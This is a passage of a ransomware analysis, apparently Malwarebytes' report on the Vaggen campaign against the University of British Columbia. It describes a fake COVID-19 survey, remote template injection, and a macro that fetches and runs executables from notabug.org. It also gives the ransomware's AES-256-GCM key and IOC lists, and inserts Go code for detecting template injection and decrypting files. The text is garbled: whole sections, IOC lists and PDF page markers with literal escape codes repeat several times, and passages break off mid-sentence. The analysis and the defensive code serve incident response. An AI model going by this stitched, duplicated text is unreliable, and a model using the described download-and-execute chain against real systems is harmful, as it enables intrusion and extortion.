Using a hardcoded key and 12 bytes long nonce,\r\ngenerated by CryptGenRandom. The file content is encrypted with the help of the gcm.Seal function.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2298 of 3467\n\nThe content of the output file (with .VAGGEN extension) contains:\r\nthe 12 bytes long nonce\r\nthe encrypted content\r\nthe 16 byte long GCM Tag\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2299 of 3467\n\nThe hardcoded key “du_tar_mitt_hjart_mina_pengarna0” found inside the malware code is Swedish for “you take\r\nmy heart my money”. Using this key, we can easily decrypt the content.\r\nWith all these elements, we can actually recover encrypted files without having to pay the ransom. It appears that\r\nthe malware author has not received any payment so far at this Bitcoin address.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2300 of 3467\n\nUnusually low ransom amount\r\nBased on our findings, we believe this is not a sophisticated threat actor, nor affiliated with any of the big\r\nransomware gangs such as Ryuk. The ransom amount is unusually low, and unlike professional ransomware, this\r\nattack can be recovered from fairly easy.\r\nHowever, the phishing attack was well conceived and the template looks well designed, with a nice touch of\r\nadding canary tokens. It’s unclear at this point if the University of British Columbia was the sole target or not.\r\nCrawling additional repositories created by the threat actor, we found other Word template files that have used a\r\nvery similar macro to drop a coin miner. This casts more questions about the motivation behind this phishing\r\nattack.\r\nWe are grateful for the information shared with us by the University of British Columbia. 
This allowed us to paint\r\na better picture of this attack and understand who the targets were.\r\nMalwarebytes customers were already protected thanks to our signature-less Anti-Exploit layer.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2301 of 3467\n\nIOCs\r\nVariant1:\r\nsummerofficetemplate.dotm\r\n634264996c0d27b71a5b63fb87042e29660de7ae8f18fcc27b97ab86cb92b6d4\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\n34842eff9870ea15ce3b3f3ec8d80c6fd6a22f65b6bae187d8eca014f11aafa5\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant2:\r\nUBC-COVID19-Survey-Mandatory.docx\r\ne869e306c532aaf348725d94c1d5da656228d316071dede76be8fcd7384391c3\r\ntemplate.dotm\r\n334531228a447e4dfd427b08db228c62369461bb2ccde9ab1315649efd0316b1\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe\r\ncanarytokens[.]com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp\r\ncanarytokens[.]com/articles/6dbbnd503z06qitej1sdzzcvv/index.html\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2302 of 
This post was authored by Jérôme Segura with contributions from Hossein Jazi, Hasherezade and Marcelo Rivero.

In recent weeks, we have observed a number of phishing attacks against universities worldwide, which we attributed to the Silent Librarian APT group.
On October 19, we identified a new phishing document targeting staff at the University of British Columbia (UBC) with a fake COVID-19 survey.

However, this attack and its motives differ from the ones previously documented. The survey is a malicious Word document whose purpose is to download ransomware and extort victims into paying to recover their encrypted files.

On discovery, we got in touch with UBC to report our findings. They were already aware of this phishing campaign and were kind enough to share more information with us about the incident. Ultimately, this attack was not successful, thanks to the rapid response of the UBC cybersecurity team.

Mandatory COVID-19 survey distributed to targeted recipients

The attacker created an email address with the mailpoof.com service in order to register accounts with Box.net and Dropbox. Rather than sending the fake survey via email directly, the attacker uploaded the document to Box and Dropbox and used the share functionality of these platforms to distribute it.

This was probably done to evade spam and phishing filters that would have blocked messages coming from a newly registered email address with a low reputation. In comparison, it is much more difficult to detect spam sent through file sharing services without creating a number of false positives.

The attacker claimed to be a manager and added the following comment in the file sharing invitation (shared with us by UBC):

Good evening gals and guys! [redacted] here, [redacted] manager for [redacted]. I am sharing a mandatory survey with you that must be completed by Monday. It asks a few questions about how you believe our company responded to the pandemic regarding remote working and much more.
Please fill it out ASAP!

You will also find a form at the end that you can fill out if you need any necessities! Necessities include: gloves, hand sanitizer, masks, or disinfectant spray. We will be providing it to those employees who fill out the form for free! Simply sign your initials and put what you need as well as the quantity!

In advance, we appreciate your feedback! Thanks all! Stay strong! I understand times like this can be difficult!

According to UBC, fewer than a hundred people within a specific department received the link to access the shared document. A Box or Dropbox account was required in order to download the file, since it was shared privately rather than publicly. This may have been an effort to evade detection, or perhaps the attacker expected the target organization to already be using one of these two sharing services.

Phishing document analysis

The phishing document uses template injection to download and execute a remote template (template.dotm) weaponized with a malicious macro. The .docx itself carries no macro code: its attached-template relationship points at a URL instead of a local file, and Word fetches and loads that .dotm, macros included, when the document is opened, which is why the lure passes through filters that only inspect the attachment for VBA.
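The relationship Word follows is visible inside the document package itself, so template injection can be detected statically before anyone opens the file. The Go program below is an added example written for this page, not Malwarebytes' tooling or anything from the actor's repositories: it opens an OOXML package (a .docx or .dotm is a zip archive), reads every .rels part and reports attachedTemplate relationships whose TargetMode is External, which is the tell-tale of the technique. The two sample documents are constructed in memory; the notabug.org path in the injected one is a placeholder, not the real template URL from this campaign.

```go
package main

import (
	"archive/zip"
	"bytes"
	"encoding/xml"
	"fmt"
	"io"
	"strings"
)

// attachedTemplateRel is the OOXML relationship type Word uses for a document's
// attached template; it normally lives in word/_rels/settings.xml.rels.
const attachedTemplateRel = "http://schemas.openxmlformats.org/officeDocument/2006/relationships/attachedTemplate"

// relationships mirrors the subset of the .rels schema needed here.
type relationships struct {
	Rels []struct {
		ID         string `xml:"Id,attr"`
		Type       string `xml:"Type,attr"`
		Target     string `xml:"Target,attr"`
		TargetMode string `xml:"TargetMode,attr"`
	} `xml:"Relationship"`
}

// RemoteTemplates returns every external attachedTemplate target in a package.
// A non-empty result means Word will fetch and load a remote template, with any
// macros it contains, as soon as the document is opened.
func RemoteTemplates(pkg []byte) ([]string, error) {
	zr, err := zip.NewReader(bytes.NewReader(pkg), int64(len(pkg)))
	if err != nil {
		return nil, fmt.Errorf("not a zip/OOXML package: %w", err)
	}
	var found []string
	for _, f := range zr.File {
		// Check every .rels part, not just settings.xml.rels, so an oddly
		// placed relationship does not slip past.
		if !strings.HasSuffix(f.Name, ".rels") {
			continue
		}
		rc, err := f.Open()
		if err != nil {
			return nil, err
		}
		data, err := io.ReadAll(rc)
		rc.Close()
		if err != nil {
			return nil, err
		}
		var rels relationships
		if err := xml.Unmarshal(data, &rels); err != nil {
			continue // not a relationships part we can parse; skip it
		}
		for _, r := range rels.Rels {
			if r.Type == attachedTemplateRel && r.TargetMode == "External" {
				found = append(found, r.Target)
			}
		}
	}
	return found, nil
}

// buildSample constructs a minimal in-memory OOXML package whose only
// interesting part is word/_rels/settings.xml.rels. Constructed test data.
func buildSample(settingsRels string) []byte {
	var buf bytes.Buffer
	zw := zip.NewWriter(&buf)
	parts := map[string]string{
		"[Content_Types].xml":          `<?xml version="1.0" encoding="UTF-8"?><Types xmlns="http://schemas.openxmlformats.org/package/2006/content-types"/>`,
		"word/document.xml":            `<?xml version="1.0" encoding="UTF-8"?><w:document xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main"/>`,
		"word/_rels/settings.xml.rels": settingsRels,
	}
	for name, body := range parts {
		w, _ := zw.Create(name)
		w.Write([]byte(body))
	}
	zw.Close()
	return buf.Bytes()
}

// Placeholder remote template location: the host is the one named in the post,
// the path is made up for this example.
const placeholderTemplateURL = "https://notabug.org/EXAMPLE-USER/EXAMPLE-REPO/raw/master/template.dotm"

// Injected document: attachedTemplate is an External relationship to a URL.
const injectedRels = `<?xml version="1.0" encoding="UTF-8"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships">
  <Relationship Id="rId1" Type="` + attachedTemplateRel + `" Target="` + placeholderTemplateURL + `" TargetMode="External"/>
</Relationships>`

// Benign document: the attached template is a local file, no TargetMode.
const benignRels = `<?xml version="1.0" encoding="UTF-8"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships">
  <Relationship Id="rId1" Type="` + attachedTemplateRel + `" Target="Normal.dotm"/>
</Relationships>`

func main() {
	for name, rels := range map[string]string{"injected": injectedRels, "benign": benignRels} {
		urls, err := RemoteTemplates(buildSample(rels))
		if err != nil {
			panic(err)
		}
		fmt.Printf("%s: remote templates = %q\n", name, urls)
	}
}
```

Run it over a suspicious attachment with RemoteTemplates(os.ReadFile(path)) and treat any returned URL as a download-and-execute indicator worth blocking at the proxy; the same check also surfaces the hosting domain (here a free code hosting site) for hunting across mail logs.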
That template file was uploaded to a free code hosting website (notabug.org).

When the macro is executed, it does the following:

Gets the %APPDATA% directory
Creates the Byxor directory in %APPDATA%
Downloads a file from the following URL and writes it as Polisen.exe:
notabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe
Downloads a file from the following URL and writes it as Killar.exe:
notabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe
Calls the VBA Shell function to execute killar.exe
Checks the return value of Shell to see whether the launch succeeded (Shell returns the task ID of the started program on success)
If it succeeded, it sends an HTTP GET request to:
canarytokens[.]com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp
If it did not, it sends an HTTP GET request to:
canarytokens[.]com/articles/6dbbnd503z06qitej1sdzzcvv/index.html

We were able to identify four other variants of the remote templates and payloads. In some of the folders, we found several artifacts using Swedish words (Byxor, Polisen and Killar, for instance, are Swedish for trousers, the police and guys), which could indicate that the threat actor is familiar with the language.

Opening the phishing document will trigger a notification via the canarytokens.com website. Typically, people use this type of service to get alerted on a particular event: a token is a unique URL that reports back to its owner whenever it is requested. This can be very useful as an early warning system that an intruder has gained access to a network.
In this case, the attacker is probably interested in how many people opened the document and perhaps where they are from, since the two tokens also tell him whether the payload launched.

Vaggen ransomware

After being deployed, the ransomware starts encrypting the user's files and adding the .VAGGEN extension to them. When the encryption process is finished, it drops a ransom note on the Desktop, demanding a payment equivalent to 80 USD to be paid in Bitcoin.

The ransomware appears to be coded from scratch and is a relatively straightforward application written in Go, which starts with the function denoted as ‘main_main’.

Other functions belonging to the main application have obfuscated, Swedish-looking names, such as: main_FOLOJVAG, main_DUVETVAD, main_ELDBJORT, main_HIDDENBERRIES, main_LAMNARDETTA, main_SPRINGA. The roles recovered during analysis:

main_LAMNARDETTA -> main_enumDir
main_ELDBJORT -> main_encryptFile
main_SPRINGA -> main_encryptAndRen

A full list of the functions, along with their RVAs, can be found here.

Some of the strings used by the malware (notably the content of the ransom note) are encrypted with XXTEA (using the xxtea-go library). Encrypted chunks are first decoded from Base64 and then decrypted with the hardcoded XXTEA key “STALKER”. At the end of the execution, the ransom note is dropped on the Desktop.

Encrypting and renaming the files is implemented as the callback passed to the standard library function filepath.Walk (package path/filepath), which visits every file under the chosen root.

Files are encrypted with AES-256 (32-byte key) in GCM mode. The encryption routine is similar to the one demonstrated here.
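The scheme as the post describes it (AES-256-GCM, a hardcoded 32-byte key, a fresh 12-byte nonce per file, and an output consisting of nonce, ciphertext and tag, detailed in the paragraphs that follow) is what makes the files recoverable without payment. The Go program below is an added example written for this page, not the malware's code and not a Malwarebytes tool: SealVaggen re-creates that on-disk layout for constructed sample data, and OpenVaggen is the matching decryptor. The key string is the one quoted in the post; the sample plaintext and the wrong key are made up.

```go
package main

import (
	"bytes"
	"crypto/aes"
	"crypto/cipher"
	"crypto/rand"
	"errors"
	"fmt"
)

// vaggenKey is the 32-byte hardcoded key reported in the post. Its length is
// what selects AES-256; the trailing "0" pads the Swedish phrase to 32 bytes.
const vaggenKey = "du_tar_mitt_hjart_mina_pengarna0"

const (
	nonceSize = 12 // standard GCM nonce
	tagSize   = 16 // GCM authentication tag
)

// newGCM builds an AES-256-GCM AEAD, rejecting any key that is not 32 bytes.
func newGCM(key []byte) (cipher.AEAD, error) {
	if len(key) != 32 {
		return nil, fmt.Errorf("key must be 32 bytes for AES-256, got %d", len(key))
	}
	block, err := aes.NewCipher(key)
	if err != nil {
		return nil, err
	}
	return cipher.NewGCM(block) // 12-byte nonce, 16-byte tag
}

// SealVaggen reproduces the layout described for a .VAGGEN file:
// nonce || ciphertext || tag, which is exactly what gcm.Seal(nonce, nonce, pt, nil)
// produces. Re-implementation of the described scheme for test data, not the
// malware's code.
func SealVaggen(key, plaintext []byte) ([]byte, error) {
	gcm, err := newGCM(key)
	if err != nil {
		return nil, err
	}
	nonce := make([]byte, nonceSize)
	if _, err := rand.Read(nonce); err != nil {
		return nil, err
	}
	return gcm.Seal(nonce, nonce, plaintext, nil), nil
}

// OpenVaggen recovers the plaintext of a .VAGGEN blob. Because GCM is
// authenticated, a wrong key or a damaged file fails with an error instead of
// yielding garbage, so the result can be trusted before the original is restored.
func OpenVaggen(key, blob []byte) ([]byte, error) {
	if len(blob) < nonceSize+tagSize {
		return nil, errors.New("file too short to hold a nonce and a GCM tag")
	}
	gcm, err := newGCM(key)
	if err != nil {
		return nil, err
	}
	nonce, ct := blob[:nonceSize], blob[nonceSize:]
	pt, err := gcm.Open(nil, nonce, ct, nil)
	if err != nil {
		return nil, fmt.Errorf("authentication failed (wrong key or damaged file): %w", err)
	}
	return pt, nil
}

func main() {
	// Constructed sample document, not real victim data.
	original := []byte("Quarterly budget draft - do not distribute")
	blob, err := SealVaggen([]byte(vaggenKey), original)
	if err != nil {
		panic(err)
	}
	fmt.Printf("encrypted size: %d bytes (%d nonce + %d data + %d tag)\n",
		len(blob), nonceSize, len(original), tagSize)

	recovered, err := OpenVaggen([]byte(vaggenKey), blob)
	if err != nil {
		panic(err)
	}
	fmt.Printf("recovered matches original: %v\n", bytes.Equal(recovered, original))

	// A 32-byte key that is not the real one: GCM rejects it outright.
	_, err = OpenVaggen([]byte("wrong_key_wrong_key_wrong_key_00"), blob)
	fmt.Printf("wrong key rejected: %v\n", err != nil)
}
```

OpenVaggen fails closed: a wrong key, a truncated file or a flipped byte in the tag all return an error, so a recovery script can overwrite the .VAGGEN file only when Open succeeds. To restore a whole tree, walk it with filepath.Walk, call OpenVaggen on each *.VAGGEN file and strip the extension to recover the original name.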
Using a hardcoded key and 12 bytes long nonce,\r\ngenerated by CryptGenRandom. The file content is encrypted with the help of the gcm.Seal function.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2310 of 3467\n\nThe content of the output file (with .VAGGEN extension) contains:\r\nthe 12 bytes long nonce\r\nthe encrypted content\r\nthe 16 byte long GCM Tag\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2311 of 3467\n\nThe hardcoded key “du_tar_mitt_hjart_mina_pengarna0” found inside the malware code is Swedish for “you take\r\nmy heart my money”. Using this key, we can easily decrypt the content.\r\nWith all these elements, we can actually recover encrypted files without having to pay the ransom. It appears that\r\nthe malware author has not received any payment so far at this Bitcoin address.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2312 of 3467\n\nUnusually low ransom amount\r\nBased on our findings, we believe this is not a sophisticated threat actor, nor affiliated with any of the big\r\nransomware gangs such as Ryuk. The ransom amount is unusually low, and unlike professional ransomware, this\r\nattack can be recovered from fairly easy.\r\nHowever, the phishing attack was well conceived and the template looks well designed, with a nice touch of\r\nadding canary tokens. It’s unclear at this point if the University of British Columbia was the sole target or not.\r\nCrawling additional repositories created by the threat actor, we found other Word template files that have used a\r\nvery similar macro to drop a coin miner. This casts more questions about the motivation behind this phishing\r\nattack.\r\nWe are grateful for the information shared with us by the University of British Columbia. 
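As an added example (this is not code from the Malwarebytes write-up or from the malware itself), the following Go program works with the .VAGGEN layout described in the Vaggen section above, nonce (12 bytes) || ciphertext || GCM tag (16 bytes), under the key the analysis reports as hardcoded. DecryptVaggen parses such a blob and decrypts it with AES-256-GCM, rejecting blobs too short to hold a nonce and a tag and surfacing GCM authentication failures for a wrong key or a damaged file instead of emitting garbage. EncryptVaggenSample is constructed test scaffolding that produces a blob in the same layout from constructed input so the decryptor can be exercised offline. The names DecryptVaggen, EncryptVaggenSample and VaggenKey are this example's own, and crypto/rand stands in for the CryptGenRandom call the page mentions.

```go
package main

import (
	"crypto/aes"
	"crypto/cipher"
	"crypto/rand"
	"errors"
	"fmt"
)

// VaggenKey is the 32-byte key the write-up reports as hardcoded in the sample
// (its length is what makes this AES-256).
const VaggenKey = "du_tar_mitt_hjart_mina_pengarna0"

const (
	nonceSize = 12 // nonce length reported for the .VAGGEN layout
	tagSize   = 16 // GCM authentication tag length
)

// DecryptVaggen recovers the plaintext of a blob laid out as
// nonce(12) || ciphertext || tag(16). Go's GCM expects the tag appended to
// the ciphertext, so the slice after the nonce is passed to Open unchanged.
func DecryptVaggen(blob, key []byte) ([]byte, error) {
	if len(key) != 32 {
		return nil, fmt.Errorf("AES-256 needs a 32-byte key, got %d bytes", len(key))
	}
	if len(blob) < nonceSize+tagSize {
		return nil, errors.New("blob too short to hold a nonce and a GCM tag")
	}
	block, err := aes.NewCipher(key)
	if err != nil {
		return nil, err
	}
	gcm, err := cipher.NewGCM(block) // standard 12-byte nonce, 16-byte tag
	if err != nil {
		return nil, err
	}
	nonce, sealed := blob[:nonceSize], blob[nonceSize:]
	// Open verifies the tag before returning anything, so a wrong key or a
	// truncated/corrupted file yields an error rather than garbage output.
	return gcm.Open(nil, nonce, sealed, nil)
}

// EncryptVaggenSample builds a blob in the same layout from constructed input
// so the decryptor can be exercised offline. It is test scaffolding written
// for this example, not the malware's routine; the nonce comes from
// crypto/rand here in place of CryptGenRandom.
func EncryptVaggenSample(plaintext, key []byte) ([]byte, error) {
	block, err := aes.NewCipher(key)
	if err != nil {
		return nil, err
	}
	gcm, err := cipher.NewGCM(block)
	if err != nil {
		return nil, err
	}
	nonce := make([]byte, nonceSize)
	if _, err := rand.Read(nonce); err != nil {
		return nil, err
	}
	// Seal appends ciphertext||tag to dst; passing the nonce as dst produces
	// exactly the nonce || ciphertext || tag layout described above.
	return gcm.Seal(nonce, nonce, plaintext, nil), nil
}

func main() {
	key := []byte(VaggenKey)
	sample := []byte("constructed sample document content") // constructed input
	blob, err := EncryptVaggenSample(sample, key)
	if err != nil {
		panic(err)
	}
	plain, err := DecryptVaggen(blob, key)
	if err != nil {
		panic(err)
	}
	fmt.Printf("blob is %d bytes (12 nonce + %d data + 16 tag); recovered %q\n",
		len(blob), len(sample), plain)
}
```

A recovery tool built on this would call DecryptVaggen on each .VAGGEN file and write the plaintext to a new file, keeping the original until the GCM authentication check has passed, since any error from Open means the key or the file is not what was expected.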
This allowed us to paint a better picture of this attack and understand who the targets were.\r\nMalwarebytes customers were already protected thanks to our signature-less Anti-Exploit layer.\r\nIOCs\r\nVariant 1:\r\nsummerofficetemplate.dotm\r\n634264996c0d27b71a5b63fb87042e29660de7ae8f18fcc27b97ab86cb92b6d4\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\n34842eff9870ea15ce3b3f3ec8d80c6fd6a22f65b6bae187d8eca014f11aafa5\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant 2:\r\nUBC-COVID19-Survey-Mandatory.docx\r\ne869e306c532aaf348725d94c1d5da656228d316071dede76be8fcd7384391c3\r\ntemplate.dotm\r\n334531228a447e4dfd427b08db228c62369461bb2ccde9ab1315649efd0316b1\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe\r\ncanarytokens[.]com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp\r\ncanarytokens[.]com/articles/6dbbnd503z06qitej1sdzzcvv/index.html\r\n
polisen.exe\r\n03420a335457e352e614dd511f8b03a7a8af600ca67970549d4f27543a151bcf\r\nkillar.exe\r\n43c222eea7f1e367757e587b13bf17019f29bd61c07d20cbee14c4d66d43a71f\r\nVariant 3:\r\ntemplate1.dotm\r\n225e19abba17f70df00562e89a5d4ad5e3818e40fd4241120a352aba344074f4\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/irving.exe\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/alderson.exe\r\ncanarytokens[.]com/images/tags/8pkmk2o11dmp1xjv5i9svji32/contact.php\r\ncanarytokens[.]com/articles/traffic/5ayx8tydzeuzhmq6y5u2lxhpa/post.jsp\r\nVariant 4:\r\nsmoothtemplates.dotm\r\nada43ee41f70e327944121217473c536024cd9c90e25088a1a6c5cf895f59fe1\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\nb4a1a0012abde1ae68f50fa1fe53df7a5d933ec5410731622ab0ad505915cfb6\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant 5:\r\ntemplate.dotm\r\n7ad8a3c438f36cdfc5928e9f3c7c052463b5987055f583ff716d0382d0eb23b4\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrclean.exe\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrmonster.exe\r\ncanarytokens[.]com/images/feedback/tags/0xu6dnwmpc1k1j2i3nec3fq2b/post.jsp\r\ncanarytokens[.]com/traffic/about/images/ff6x6licr69lmjva84rn65hao/contact.php\r\nmrmonster.exe\r\nf42bbb178e86dc3449662b5fe4c331e3489de01277f00a56add12501bf8e6c23\r\nmrclean.exe\r\n71aadf3c1744f919cddcc157ff5247b1af2e2211b567e1eee2769973b2f7332a\r\n
This allowed us to paint\r\na better picture of this attack and understand who the targets were.\r\nMalwarebytes customers were already protected thanks to our signature-less Anti-Exploit layer.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2352 of 3467\n\nIOCs\r\nVariant1:\r\nsummerofficetemplate.dotm\r\n634264996c0d27b71a5b63fb87042e29660de7ae8f18fcc27b97ab86cb92b6d4\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\n34842eff9870ea15ce3b3f3ec8d80c6fd6a22f65b6bae187d8eca014f11aafa5\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant2:\r\nUBC-COVID19-Survey-Mandatory.docx\r\ne869e306c532aaf348725d94c1d5da656228d316071dede76be8fcd7384391c3\r\ntemplate.dotm\r\n334531228a447e4dfd427b08db228c62369461bb2ccde9ab1315649efd0316b1\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe\r\ncanarytokens[.]com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp\r\ncanarytokens[.]com/articles/6dbbnd503z06qitej1sdzzcvv/index.html\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2353 of 
3467\n\npolisen.exe\r\n03420a335457e352e614dd511f8b03a7a8af600ca67970549d4f27543a151bcf\r\nkillar.exe\r\n43c222eea7f1e367757e587b13bf17019f29bd61c07d20cbee14c4d66d43a71f\r\nVariant3:\r\ntemplate1.dotm\r\n225e19abba17f70df00562e89a5d4ad5e3818e40fd4241120a352aba344074f4\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/irving.exe\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/alderson.exe\r\ncanarytokens[.]com/images/tags/8pkmk2o11dmp1xjv5i9svji32/contact.php\r\ncanarytokens[.]com/articles/traffic/5ayx8tydzeuzhmq6y5u2lxhpa/post.jsp\r\nVariant4:\r\nsmoothtemplates.dotm\r\nada43ee41f70e327944121217473c536024cd9c90e25088a1a6c5cf895f59fe1\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\nb4a1a0012abde1ae68f50fa1fe53df7a5d933ec5410731622ab0ad505915cfb6\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant5:\r\ntemplate.dotm:\r\n7ad8a3c438f36cdfc5928e9f3c7c052463b5987055f583ff716d0382d0eb23b4\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrclean.exe\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrmonster.exe\r\ncanarytokens[.]com/images/feedback/tags/0xu6dnwmpc1k1j2i3nec3fq2b/post.jsp\r\ncanarytokens[.]com/traffic/about/images/ff6x6licr69lmjva84rn65hao/contact.php\r\nmrmonster.exe\r\nf42bbb178e86dc3449662b5fe4c331e3489de01277f00a56add12501bf8e6c23\r\nmrclean.exe\r\n71aadf3c1744f919cddcc157ff5247b1af2e2211b567e1eee2769973b2f7332a\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2354 of 3467\n\nAccording to UBC, less than a hundred people within a specific department received the link to access the shared\r\ndocument. 
A Box or Dropbox account was required in order to download the file since it was shared privately,\r\ninstead of publicly. This may have been an effort to evade detection or perhaps the attacker expected the target\r\norganization to already be using one of these two sharing services.\r\nPhishing document analysis\r\nThe phishing document uses template injection to download and execute a remote template (template.dotm)\r\nweaponized with a malicious macro. That file was uploaded to a free code hosting website (notabug.org).\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2355 of 3467\n\nWhen the macro is executed, it does the following:\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2356 of 3467\n\nGets the %APPDATA% directory\r\nCreates the Byxor directory in %APPDATA%\r\nDownloads a file from the following url and writes it as Polisen.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe\r\nDownloads a file from the following url and writes it as Killar.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe\r\nCalls shell function to execute killar.exe\r\nChecks the output of shell function and whether it was successful (return value would be task Id of\r\nexecuted application)\r\nIf successful, it sends a GET http request to:\r\ncanarytokens.com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp\r\nIf it isn’t successful, it sends a GET http request to:\r\ncanarytokens.com/articles/6dbbnd503z06qitej1sdzzcvv/index.html\r\nWe were able to identify four other variants of the remote templates and payloads. In some of the folders, we\r\nfound several artifacts using Swedish words, which could indicate that the threat actor is familiar with the\r\nlanguage.\r\nOpening the phishing document will trigger a notification via the canarytokens.com website. 
Typically, people use\r\nthis type of service to get alerted for a particular event.\r\nThis can be very useful as an early warning notification system that an intruder has had access to a network. In\r\nthis case, the attacker is probably interested in how many people opened the document and perhaps where they are\r\nfrom.\r\nVaggen ransomware\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2357 of 3467\n\nAfter being deployed, the ransomware starts encrypting the user’s files and adding the .VAGGEN extension to\r\nthem. When the encryption process is finished, it drops a ransom note on the Desktop, demanding a payment\r\nequivalent to 80 USD to be paid in Bitcoin.\r\nThe ransomware appears to be coded from scratch and is a relatively straightforward application written in Go\r\nwhich starts with the function denoted as ‘main_main’.\r\nOther functions belonging to the main application have obfuscated names, such as: main_FOLOJVAG,\r\nmain_DUVETVAD, main_ELDBJORT, main_HIDDENBERRIES, main_LAMNARDETTA, main_SPRINGA.\r\nmain_LAMNARDETTA -\u003e main_enumDir main_ELDBJORT -\u003e main_encryptFile main_SPRINGA -\u003e main_encryptAndRen\r\nA full list of the functions, along with their RVAs can be found here.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2358 of 3467\n\nSome of the strings used by the malware (i.e. the content of the ransom note) are encrypted with the help 